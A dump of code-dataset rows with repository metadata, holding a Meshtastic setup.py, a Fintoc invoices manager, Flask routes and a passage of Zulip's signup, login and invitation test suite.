Dataset schema:

| column | dtype | range / values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 3 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 972 |
| max_stars_repo_name | string | length 6 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64, nullable | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string, nullable | length 24 |
| max_stars_repo_stars_event_max_datetime | string, nullable | length 24 |
| max_issues_repo_path | string | length 3 to 972 |
| max_issues_repo_name | string | length 6 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64, nullable | 1 to 116k |
| max_issues_repo_issues_event_min_datetime | string, nullable | length 24 |
| max_issues_repo_issues_event_max_datetime | string, nullable | length 24 |
| max_forks_repo_path | string | length 3 to 972 |
| max_forks_repo_name | string | length 6 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64, nullable | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string, nullable | length 24 |
| max_forks_repo_forks_event_max_datetime | string, nullable | length 24 |
| content | string | length 3 to 1.03M |
| avg_line_length | float64 | 1.13 to 941k |
| max_line_length | int64 | 2 to 941k |
| alphanum_fraction | float64 | 0 to 1 |
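Each row that follows carries three repo-metadata variants per file (max_stars, max_issues, max_forks) plus the file `content` and simple line statistics. As a hedged illustration of how rows with this schema are typically consumed, the sketch below streams such a dataset with the Hugging Face `datasets` library; the dataset id is a placeholder, since this dump does not name its source.

```python
# Sketch only: iterate rows matching the schema above with the `datasets` library.
# "<dataset-id>" is a placeholder -- the dump does not say which dataset it comes from.
from datasets import load_dataset

rows = load_dataset("<dataset-id>", split="train", streaming=True)
for row in rows:
    # max_*_count and the event datetime columns are nullable.
    if row["ext"] == "py" and row["max_stars_count"] is not None:
        print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["size"])
```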
| hexsha | size | ext | lang |
|---|---|---|---|
| 03363eef7025fa99b4d3764cff3b4ec766405a19 | 1,429 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | setup.py | crossan007/Meshtastic-python | 27c827cf3d42aec9834600b1b61a1681b0c714a9 | ["Apache-2.0"] | null | null | null |
| max_issues | setup.py | crossan007/Meshtastic-python | 27c827cf3d42aec9834600b1b61a1681b0c714a9 | ["Apache-2.0"] | null | null | null |
| max_forks | setup.py | crossan007/Meshtastic-python | 27c827cf3d42aec9834600b1b61a1681b0c714a9 | ["Apache-2.0"] | null | null | null |

content:
# Note: you shouldn't need to run this script manually. It is run implicitly by the pip3 install command.
import pathlib
from setuptools import setup

# The directory containing this file
HERE = pathlib.Path(__file__).parent

with open("README.md", "r") as fh:
    long_description = fh.read()

# This call to setup() does all the work
setup(
    name="meshtastic",
    version="1.2.6",
    description="Python API & client shell for talking to Meshtastic devices",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/meshtastic/Meshtastic-python",
    author="Kevin Hester",
    author_email="kevinh@geeksville.com",
    license="MIT",
    classifiers=[
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
    ],
    packages=["meshtastic"],
    include_package_data=True,
    install_requires=["pyserial>=3.4", "protobuf>=3.13.0",
                      "pypubsub>=4.0.3", "dotmap>=1.3.14", "pexpect>=4.6.0", "pyqrcode>=1.2.1",
                      "pygatt>=4.0.5", "easy-table==0.0.4"],
    extras_require={
        'tunnel': ["pytap2>=2.0.0"]
    },
    python_requires='>=3.6',
    entry_points={
        "console_scripts": [
            "meshtastic=meshtastic.__main__:main",
            "mesh-tunnel=meshtastic.__main__:tunnelMain [tunnel]"
        ]
    },
)
| avg_line_length | max_line_length | alphanum_fraction |
|---|---|---|
| 32.477273 | 106 | 0.628411 |
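The `entry_points` block in the setup.py above is what puts the `meshtastic` and `mesh-tunnel` commands on the PATH after installation, and the `[tunnel]` marker ties `mesh-tunnel` to the optional `tunnel` extra (`pytap2`). As a hedged sketch, the snippet below resolves the `meshtastic` console script the same way a pip-generated wrapper would; it assumes the package is installed and Python 3.10+ for the keyword form of `entry_points()`.

```python
# Sketch: resolve the "meshtastic" console script declared in the setup.py above.
# Assumes the package is installed and Python 3.10+ (keyword filtering of entry points).
from importlib.metadata import entry_points

(script,) = entry_points(group="console_scripts", name="meshtastic")
main = script.load()   # imports meshtastic.__main__ and returns its main() callable
main()                 # equivalent to running `meshtastic` with the current sys.argv
```

Installing the optional extra, e.g. `pip3 install "meshtastic[tunnel]"`, pulls in `pytap2` so that the `mesh-tunnel` script declared with the `[tunnel]` marker can import its dependency.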
| hexsha | size | ext | lang |
|---|---|---|---|
| 9caf9f0fa2308af1bd3ec8fa4ade1378d9f156e8 | 213 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | fintoc/managers/invoices_manager.py | KnowYourselves/fintoc-python | 7b61850db6bb029aafd6fbf8e37b46e1188474a9 | ["BSD-3-Clause"] | 80 | 2020-05-10T13:41:26.000Z | 2022-01-14T14:20:40.000Z |
| max_issues | fintoc/managers/invoices_manager.py | nmassardot/fintoc-python | 5560e1f06ede0ff155d4274d3d8cf91e40e53710 | ["BSD-3-Clause"] | 23 | 2020-05-27T22:48:06.000Z | 2022-01-04T13:40:09.000Z |
| max_forks | fintoc/managers/invoices_manager.py | nmassardot/fintoc-python | 5560e1f06ede0ff155d4274d3d8cf91e40e53710 | ["BSD-3-Clause"] | 8 | 2020-09-22T16:13:32.000Z | 2021-12-11T19:58:58.000Z |

content:

"""Module to hold the invoices manager."""
"""Module to hold the invoices manager."""
from fintoc.mixins import ManagerMixin
class InvoicesManager(ManagerMixin):
"""Represents an invoices manager."""
resource = "invoice"
methods = ["all"]
| avg_line_length | max_line_length | alphanum_fraction |
|---|---|---|
| 17.75 | 42 | 0.694836 |
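The class body above is purely declarative: `ManagerMixin` reads the `resource` and `methods` class attributes and exposes only the whitelisted operations (here just `all`). The sketch below is a hypothetical rendering of that contract for illustration; it is not the actual `fintoc.mixins.ManagerMixin` implementation, and the `client.request` helper is assumed.

```python
# Hypothetical sketch of the contract InvoicesManager relies on; the real
# fintoc.mixins.ManagerMixin may differ in names and details.
class ManagerMixin:
    resource = None   # e.g. "invoice"
    methods = []      # operations a concrete manager chooses to expose, e.g. ["all"]

    def __init__(self, client):
        self._client = client

    def all(self, **params):
        if "all" not in self.methods:
            raise AttributeError(f"{type(self).__name__} does not expose 'all'")
        # A real client would page through GET /<resource>s requests here.
        return self._client.request(f"/{self.resource}s", params=params)
```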
| hexsha | size | ext | lang |
|---|---|---|---|
| 35d2c9440aa28f81257dfb943be20e3163edfd05 | 1,072 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | routes/index.py | MatanelAbayof/Wikishield | 9cc34e413eb8fd0246555e8df93fe774a4531955 | ["Apache-2.0"] | 1 | 2020-08-19T10:19:22.000Z | 2020-08-19T10:19:22.000Z |
| max_issues | routes/index.py | MatanelAbayof/Wikishield | 9cc34e413eb8fd0246555e8df93fe774a4531955 | ["Apache-2.0"] | null | null | null |
| max_forks | routes/index.py | MatanelAbayof/Wikishield | 9cc34e413eb8fd0246555e8df93fe774a4531955 | ["Apache-2.0"] | null | null | null |

content:
from flask import Blueprint, redirect, render_template

index = Blueprint('index', __name__)


# ----------------------------------------------------------------------------------------------------
@index.route('/')
def homepage():
    """
    homepage route
    """
    return render_template("homepage.html")


# ----------------------------------------------------------------------------------------------------
@index.route('/score_rev')
def score_rev():
    """
    score revision route
    """
    return render_template("score_rev.html")


# ----------------------------------------------------------------------------------------------------
@index.route('/verify_revs')
def verify_revs():
    """
    verify revisions route
    """
    return render_template("verify_revs.html")


# ----------------------------------------------------------------------------------------------------
@index.route('/favicon.ico')
def favicon():
    """
    route of the favorite icon
    the browser requests this URL automatically
    """
    return redirect("images/logo.ico")
| avg_line_length | max_line_length | alphanum_fraction |
|---|---|---|
| 23.304348 | 102 | 0.399254 |
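The blueprint above only declares routes; it serves nothing until an application registers it. A minimal sketch of that wiring, assuming the file stays at `routes/index.py` (as the metadata says) and the referenced templates exist:

```python
# Sketch: mount the `index` blueprint on a Flask app.
# Assumes routes/index.py is importable as routes.index and that the
# referenced templates (homepage.html, score_rev.html, verify_revs.html) exist.
from flask import Flask
from routes.index import index

app = Flask(__name__)
app.register_blueprint(index)   # exposes /, /score_rev, /verify_revs, /favicon.ico

if __name__ == "__main__":
    app.run(debug=True)
```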
| hexsha | size | ext | lang |
|---|---|---|---|
| 2dc8c61e3884b41f3677b78b73b90cc2ee5c0ac0 | 100,699 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | zerver/tests/test_signup.py | rtzll/zulip | b831df8f7fc2f5b89ec998266901ac491d52a7fc | ["Apache-2.0"] | null | null | null |
| max_issues | zerver/tests/test_signup.py | rtzll/zulip | b831df8f7fc2f5b89ec998266901ac491d52a7fc | ["Apache-2.0"] | null | null | null |
| max_forks | zerver/tests/test_signup.py | rtzll/zulip | b831df8f7fc2f5b89ec998266901ac491d52a7fc | ["Apache-2.0"] | null | null | null |

content:
# -*- coding: utf-8 -*-
import datetime
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.http import HttpResponse
from django.test import TestCase, override_settings
from django.utils.timezone import now as timezone_now
from mock import patch, MagicMock
from zerver.lib.test_helpers import MockLDAP
from confirmation.models import Confirmation, create_confirmation_link, MultiuseInvite, \
generate_key, confirmation_url
from zerver.forms import HomepageForm, WRONG_SUBDOMAIN_ERROR
from zerver.lib.actions import do_change_password, gather_subscriptions
from zerver.views.auth import login_or_register_remote_user
from zerver.views.invite import get_invitee_emails_set
from zerver.views.registration import confirmation_key, \
redirect_and_log_into_subdomain, send_registration_completion_email
from zerver.models import (
get_realm, get_prereg_user_by_email, get_user, get_recipient,
PreregistrationUser, Realm, RealmDomain, Recipient, Message,
ScheduledEmail, UserProfile, UserMessage,
Stream, Subscription, flush_per_request_caches
)
from zerver.lib.actions import (
set_default_streams,
do_change_is_admin,
get_stream,
do_create_realm,
)
from zerver.lib.send_email import send_email, send_future_email, FromAddress
from zerver.lib.initial_password import initial_password
from zerver.lib.actions import (
do_deactivate_realm,
do_deactivate_user,
do_set_realm_property,
add_new_user_history,
)
from zerver.lib.mobile_auth_otp import xor_hex_strings, ascii_to_hex, \
otp_encrypt_api_key, is_valid_otp, hex_to_ascii, otp_decrypt_api_key
from zerver.lib.notifications import enqueue_welcome_emails, \
one_click_unsubscribe_link
from zerver.lib.subdomains import is_root_domain_available
from zerver.lib.test_helpers import find_pattern_in_email, find_key_by_email, queries_captured, \
HostRequestMock, unsign_subdomain_cookie
from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.lib.test_runner import slow
from zerver.lib.sessions import get_session_dict_user
from zerver.context_processors import common_context
from collections import defaultdict
import re
import smtplib
import ujson
from typing import Any, Dict, List, Optional, Set, Text
from six.moves import urllib, range, zip
import os
class RedirectAndLogIntoSubdomainTestCase(ZulipTestCase):
def test_cookie_data(self):
# type: () -> None
realm = Realm.objects.all().first()
name = 'Hamlet'
email = self.example_email("hamlet")
response = redirect_and_log_into_subdomain(realm, name, email)
data = unsign_subdomain_cookie(response)
self.assertDictEqual(data, {'name': name, 'email': email,
'subdomain': realm.subdomain,
'is_signup': False})
response = redirect_and_log_into_subdomain(realm, name, email,
is_signup=True)
data = unsign_subdomain_cookie(response)
self.assertDictEqual(data, {'name': name, 'email': email,
'subdomain': realm.subdomain,
'is_signup': True})
class DeactivationNoticeTestCase(ZulipTestCase):
def test_redirection_for_deactivated_realm(self):
# type: () -> None
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
for url in ('/register/', '/login/'):
result = self.client_get(url)
self.assertEqual(result.status_code, 302)
self.assertIn('deactivated', result.url)
def test_redirection_for_active_realm(self):
# type: () -> None
for url in ('/register/', '/login/'):
result = self.client_get(url)
self.assertEqual(result.status_code, 200)
def test_deactivation_notice_when_realm_is_active(self):
# type: () -> None
result = self.client_get('/accounts/deactivated/')
self.assertEqual(result.status_code, 302)
self.assertIn('login', result.url)
def test_deactivation_notice_when_deactivated(self):
# type: () -> None
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_get('/accounts/deactivated/')
self.assertIn("Zulip Dev, has been deactivated.", result.content.decode())
class AddNewUserHistoryTest(ZulipTestCase):
def test_add_new_user_history_race(self):
# type: () -> None
"""Sends a message during user creation"""
# Create a user who hasn't had historical messages added
stream_dict = {
"Denmark": {"description": "A Scandinavian country", "invite_only": False},
"Verona": {"description": "A city in Italy", "invite_only": False}
} # type: Dict[Text, Dict[Text, Any]]
realm = get_realm('zulip')
set_default_streams(realm, stream_dict)
with patch("zerver.lib.actions.add_new_user_history"):
self.register(self.nonreg_email('test'), "test")
user_profile = self.nonreg_user('test')
subs = Subscription.objects.select_related("recipient").filter(
user_profile=user_profile, recipient__type=Recipient.STREAM)
streams = Stream.objects.filter(id__in=[sub.recipient.type_id for sub in subs])
self.send_message(self.example_email('hamlet'), streams[0].name, Recipient.STREAM, "test")
add_new_user_history(user_profile, streams)
class PasswordResetTest(ZulipTestCase):
"""
Log in, reset password, log out, log in with new password.
"""
def test_password_reset(self):
# type: () -> None
email = self.example_email("hamlet")
old_password = initial_password(email)
self.login(email)
# test password reset template
result = self.client_get('/accounts/password/reset/')
self.assert_in_response('Reset your password', result)
# start the password reset process by supplying an email address
result = self.client_post('/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email to finish the process.", result)
# Check that the password reset email is from a noreply address.
from django.core.mail import outbox
from_email = outbox[0].from_email
self.assertIn("Zulip Account Security", from_email)
self.assertIn(FromAddress.NOREPLY, from_email)
# Visit the password reset link.
password_reset_url = self.get_confirmation_url_from_outbox(email, "(\S+)")
result = self.client_get(password_reset_url)
self.assertEqual(result.status_code, 200)
# Reset your password
result = self.client_post(password_reset_url,
{'new_password1': 'new_password',
'new_password2': 'new_password'})
# password reset succeeded
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/password/done/"))
# log back in with new password
self.login(email, password='new_password')
user_profile = self.example_user('hamlet')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
# make sure old password no longer works
self.login(email, password=old_password, fails=True)
def test_invalid_subdomain(self):
# type: () -> None
email = self.example_email("hamlet")
string_id = 'hamlet'
name = 'Hamlet'
do_create_realm(
string_id,
name,
restricted_to_domain=False,
invite_required=False
)
with patch('zerver.forms.get_subdomain', return_value=string_id):
# start the password reset process by supplying an email address
result = self.client_post(
'/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email to finish the process.", result)
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
message = outbox.pop()
self.assertIn(FromAddress.NOREPLY, message.from_email)
self.assertIn("hamlet@zulip.com does not\nhave an active account in http://",
message.body)
def test_correct_subdomain(self):
# type: () -> None
email = self.example_email("hamlet")
string_id = 'zulip'
with patch('zerver.forms.get_subdomain', return_value=string_id):
# start the password reset process by supplying an email address
result = self.client_post(
'/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email to finish the process.", result)
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
message = outbox.pop()
self.assertIn("Zulip Account Security", message.from_email)
self.assertIn(FromAddress.NOREPLY, message.from_email)
self.assertIn("Psst. Word on the street is that you",
message.body)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_auth_only(self):
# type: () -> None
"""If the email auth backend is not enabled, password reset should do nothing"""
email = self.example_email("hamlet")
result = self.client_post('/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email to finish the process.", result)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_redirect_endpoints(self):
# type: () -> None
'''
These tests are mostly designed to give us 100% URL coverage
in our URL coverage reports. Our mechanism for finding URL
coverage doesn't handle redirects, so we just have a few quick
tests here.
'''
result = self.client_get('/accounts/password/reset/done/')
self.assert_in_success_response(["Check your email"], result)
result = self.client_get('/accounts/password/done/')
self.assert_in_success_response(["We've reset your password!"], result)
result = self.client_get('/accounts/send_confirm/alice@example.com')
self.assert_in_success_response(["Still no email?"], result)
class LoginTest(ZulipTestCase):
"""
Logging in, registration, and logging out.
"""
def test_login(self):
# type: () -> None
self.login(self.example_email("hamlet"))
user_profile = self.example_user('hamlet')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_bad_password(self):
# type: () -> None
self.login(self.example_email("hamlet"), password="wrongpassword", fails=True)
self.assertIsNone(get_session_dict_user(self.client.session))
def test_login_nonexist_user(self):
# type: () -> None
result = self.login_with_return("xxx@zulip.com", "xxx")
self.assert_in_response("Please enter a correct email and password", result)
def test_register(self):
# type: () -> None
realm = get_realm("zulip")
stream_dict = {"stream_"+str(i): {"description": "stream_%s_description" % i, "invite_only": False}
for i in range(40)} # type: Dict[Text, Dict[Text, Any]]
for stream_name in stream_dict.keys():
self.make_stream(stream_name, realm=realm)
set_default_streams(realm, stream_dict)
# Clear all the caches.
flush_per_request_caches()
ContentType.objects.clear_cache()
Site.objects.clear_cache()
with queries_captured() as queries:
self.register(self.nonreg_email('test'), "test")
# Ensure the number of queries we make is not O(streams)
self.assert_length(queries, 65)
user_profile = self.nonreg_user('test')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
self.assertFalse(user_profile.enable_stream_desktop_notifications)
def test_register_deactivated(self):
# type: () -> None
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_post('/accounts/home/', {'email': self.nonreg_email('test')},
subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual('/accounts/deactivated/', result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user('test')
def test_register_deactivated_partway_through(self):
# type: () -> None
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
email = self.nonreg_email('test')
result = self.client_post('/accounts/home/', {'email': email},
subdomain="zulip")
self.assertEqual(result.status_code, 302)
print(result.url)
self.assertNotIn('deactivated', result.url)
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.submit_reg_form_for_user(email, "abcd1234", subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual('/accounts/deactivated/', result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user('test')
def test_login_deactivated(self):
# type: () -> None
"""
If you try to log in to a deactivated realm, you get a clear error page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.login_with_return(self.example_email("hamlet"), subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual('/accounts/deactivated/', result.url)
def test_logout(self):
# type: () -> None
self.login(self.example_email("hamlet"))
# We use the logout API, not self.logout, to make sure we test
# the actual logout code path.
self.client_post('/accounts/logout/')
self.assertIsNone(get_session_dict_user(self.client.session))
def test_non_ascii_login(self):
# type: () -> None
"""
You can log in even if your password contains non-ASCII characters.
"""
email = self.nonreg_email('test')
password = u"hümbüǵ"
# Registering succeeds.
self.register(email, password)
user_profile = self.nonreg_user('test')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
self.logout()
self.assertIsNone(get_session_dict_user(self.client.session))
# Logging in succeeds.
self.logout()
self.login(email, password)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_page_redirects_logged_in_user(self):
# type: () -> None
"""You will be redirected to the app's main page if you land on the
login page when already logged in.
"""
self.login(self.example_email("cordelia"))
response = self.client_get("/login/")
self.assertEqual(response["Location"], "http://zulip.testserver")
class InviteUserBase(ZulipTestCase):
def check_sent_emails(self, correct_recipients, custom_body=None, custom_from_name=None):
# type: (List[Text], Optional[str], Optional[str]) -> None
from django.core.mail import outbox
self.assertEqual(len(outbox), len(correct_recipients))
email_recipients = [email.recipients()[0] for email in outbox]
self.assertEqual(sorted(email_recipients), sorted(correct_recipients))
if len(outbox) == 0:
return
if custom_body is None:
self.assertNotIn("Message from", outbox[0].body)
else:
self.assertIn("Message from ", outbox[0].body)
self.assertIn(custom_body, outbox[0].body)
if custom_from_name is not None:
self.assertIn(custom_from_name, outbox[0].from_email)
self.assertIn(FromAddress.NOREPLY, outbox[0].from_email)
class InviteUserTest(InviteUserBase):
def invite(self, users, streams, body='', invite_as_admin="false"):
# type: (Text, List[Text], str, str) -> HttpResponse
"""
Invites the specified users to Zulip with the specified streams.
users should be a string containing the users to invite, comma or
newline separated.
streams should be a list of strings.
"""
return self.client_post("/json/invites",
{"invitee_emails": users,
"stream": streams,
"invite_as_admin": invite_as_admin,
"custom_body": body})
def test_successful_invite_user(self):
# type: () -> None
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login(self.example_email("hamlet"))
invitee = "alice-test@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.check_sent_emails([invitee], custom_from_name="Hamlet")
def test_successful_invite_user_as_admin_from_admin_account(self):
# type: () -> None
"""
Test that a new user invited to a stream receives some initial
history but only from public streams.
"""
self.login(self.example_email('iago'))
invitee = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee, ["Denmark"], invite_as_admin="true"))
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user('alice')
self.assertTrue(invitee_profile.is_realm_admin)
def test_invite_user_as_admin_from_normal_account(self):
# type: () -> None
"""
Test that a new user invited to a stream receives some initial
history but only from public streams.
"""
self.login(self.example_email('hamlet'))
invitee = self.nonreg_email('alice')
response = self.invite(invitee, ["Denmark"], invite_as_admin="true")
self.assert_json_error(response, "Must be a realm administrator")
def test_successful_invite_user_with_custom_body(self):
# type: () -> None
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login(self.example_email("hamlet"))
invitee = "alice-test@zulip.com"
body = "Custom Text."
self.assert_json_success(self.invite(invitee, ["Denmark"], body))
self.assertTrue(find_pattern_in_email(invitee, body))
self.check_sent_emails([invitee], custom_body=body, custom_from_name="Hamlet")
def test_successful_invite_user_with_name(self):
# type: () -> None
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login(self.example_email("hamlet"))
email = "alice-test@zulip.com"
invitee = "Alice Test <{}>".format(email)
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.check_sent_emails([email], custom_from_name="Hamlet")
def test_successful_invite_user_with_name_and_normal_one(self):
# type: () -> None
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login(self.example_email("hamlet"))
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = "Alice Test <{}>, {}".format(email, email2)
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2], custom_from_name="Hamlet")
def test_require_realm_admin(self):
# type: () -> None
"""
The invite_by_admins_only realm setting works properly.
"""
realm = get_realm('zulip')
realm.invite_by_admins_only = True
realm.save()
self.login("hamlet@zulip.com")
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = "Alice Test <{}>, {}".format(email, email2)
self.assert_json_error(self.invite(invitee, ["Denmark"]),
"Must be a realm administrator")
# Now verify an administrator can do it
self.login("iago@zulip.com")
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
def test_successful_invite_user_with_notifications_stream(self):
# type: () -> None
"""
A call to /json/invites with valid parameters unconditionally
subscribes the invitee to the notifications stream if it exists and is
public.
"""
realm = get_realm('zulip')
notifications_stream = get_stream('Verona', realm)
realm.notifications_stream_id = notifications_stream.id
realm.save()
self.login(self.example_email("hamlet"))
invitee = 'alice-test@zulip.com'
self.assert_json_success(self.invite(invitee, ['Denmark']))
self.assertTrue(find_key_by_email(invitee))
self.check_sent_emails([invitee])
prereg_user = get_prereg_user_by_email(invitee)
stream_ids = [stream.id for stream in prereg_user.streams.all()]
self.assertTrue(notifications_stream.id in stream_ids)
def test_invite_user_signup_initial_history(self):
# type: () -> None
"""
Test that a new user invited to a stream receives some initial
history but only from public streams.
"""
self.login(self.example_email('hamlet'))
user_profile = self.example_user('hamlet')
private_stream_name = "Secret"
self.make_stream(private_stream_name, invite_only=True)
self.subscribe(user_profile, private_stream_name)
public_msg_id = self.send_message(self.example_email("hamlet"), "Denmark", Recipient.STREAM,
"Public topic", "Public message")
secret_msg_id = self.send_message(self.example_email("hamlet"), private_stream_name, Recipient.STREAM,
"Secret topic", "Secret message")
invitee = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee, [private_stream_name, "Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user('alice')
invitee_msg_ids = [um.message_id for um in
UserMessage.objects.filter(user_profile=invitee_profile)]
self.assertTrue(public_msg_id in invitee_msg_ids)
self.assertFalse(secret_msg_id in invitee_msg_ids)
self.assertFalse(invitee_profile.is_realm_admin)
# Test that exactly 2 new Zulip messages were sent, both notifications.
last_3_messages = list(reversed(list(Message.objects.all().order_by("-id")[0:3])))
first_msg = last_3_messages[0]
self.assertEqual(first_msg.id, secret_msg_id)
# The first, from notification-bot to the user who invited the new user.
second_msg = last_3_messages[1]
self.assertEqual(second_msg.sender.email, "notification-bot@zulip.com")
self.assertTrue(second_msg.content.startswith("alice_zulip.com <`alice@zulip.com`> accepted your"))
# The second, from welcome-bot to the user who was invited.
third_msg = last_3_messages[2]
self.assertEqual(third_msg.sender.email, "welcome-bot@zulip.com")
self.assertTrue(third_msg.content.startswith("Hello, and welcome to Zulip!"))
def test_multi_user_invite(self):
# type: () -> None
"""
Invites multiple users with a variety of delimiters.
"""
self.login(self.example_email("hamlet"))
# Intentionally use a weird string.
self.assert_json_success(self.invite(
"""bob-test@zulip.com, carol-test@zulip.com,
dave-test@zulip.com
earl-test@zulip.com""", ["Denmark"]))
for user in ("bob", "carol", "dave", "earl"):
self.assertTrue(find_key_by_email("%s-test@zulip.com" % (user,)))
self.check_sent_emails(["bob-test@zulip.com", "carol-test@zulip.com",
"dave-test@zulip.com", "earl-test@zulip.com"])
def test_missing_or_invalid_params(self):
# type: () -> None
"""
Tests inviting with various missing or invalid parameters.
"""
self.login(self.example_email("hamlet"))
self.assert_json_error(
self.client_post("/json/invites",
{"invitee_emails": "foo@zulip.com",
"custom_body": ''}),
"You must specify at least one stream for invitees to join.")
for address in ("noatsign.com", "outsideyourdomain@example.net"):
self.assert_json_error(
self.invite(address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.")
self.check_sent_emails([])
self.assert_json_error(
self.invite("", ["Denmark"]),
"You must specify at least one email address.")
self.check_sent_emails([])
def test_invalid_stream(self):
# type: () -> None
"""
Tests inviting to a non-existent stream.
"""
self.login(self.example_email("hamlet"))
self.assert_json_error(self.invite("iago-test@zulip.com", ["NotARealStream"]),
"Stream does not exist: NotARealStream. No invites were sent.")
self.check_sent_emails([])
def test_invite_existing_user(self):
# type: () -> None
"""
If you invite an address already using Zulip, no invitation is sent.
"""
self.login(self.example_email("hamlet"))
self.assert_json_error(
self.client_post("/json/invites",
{"invitee_emails": self.example_email("hamlet"),
"stream": ["Denmark"],
"custom_body": ''}),
"We weren't able to invite anyone.")
self.assertRaises(PreregistrationUser.DoesNotExist,
lambda: PreregistrationUser.objects.get(
email=self.example_email("hamlet")))
self.check_sent_emails([])
def test_invite_some_existing_some_new(self):
# type: () -> None
"""
If you invite a mix of already existing and new users, invitations are
only sent to the new users.
"""
self.login(self.example_email("hamlet"))
existing = [self.example_email("hamlet"), u"othello@zulip.com"]
new = [u"foo-test@zulip.com", u"bar-test@zulip.com"]
result = self.client_post("/json/invites",
{"invitee_emails": "\n".join(existing + new),
"stream": ["Denmark"],
"custom_body": ''})
self.assert_json_error(result,
"Some of those addresses are already using Zulip, \
so we didn't send them an invitation. We did send invitations to everyone else!")
# We only created accounts for the new users.
for email in existing:
self.assertRaises(PreregistrationUser.DoesNotExist,
lambda: PreregistrationUser.objects.get(
email=email))
for email in new:
self.assertTrue(PreregistrationUser.objects.get(email=email))
# We only sent emails to the new users.
self.check_sent_emails(new)
prereg_user = get_prereg_user_by_email('foo-test@zulip.com')
self.assertEqual(prereg_user.email, 'foo-test@zulip.com')
